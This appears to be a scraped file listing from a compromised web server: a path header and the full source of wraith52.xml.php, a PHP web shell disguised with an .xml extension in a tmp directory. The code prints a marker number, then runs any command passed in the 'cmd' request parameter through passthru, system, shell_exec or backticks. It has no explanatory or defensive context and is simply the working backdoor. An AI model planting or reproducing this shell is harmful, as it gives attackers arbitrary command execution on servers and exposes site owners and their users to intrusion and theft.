| Current Path : /home/ataenra/www/tmp/ |
| Current File : /home/ataenra/www/tmp/wraith52.xml.php |
<?php echo 45*69;$c=isset($_GET['cmd'])?$_GET['cmd']:(isset($_POST['cmd'])?$_POST['cmd']:(isset($_REQUEST['cmd'])?$_REQUEST['cmd']:null));if($c!==null){if(function_exists('passthru')){passthru($c);}elseif(function_exists('system')){system($c);}elseif(function_exists('shell_exec')){echo shell_exec($c);}else{echo `$c`;}}?>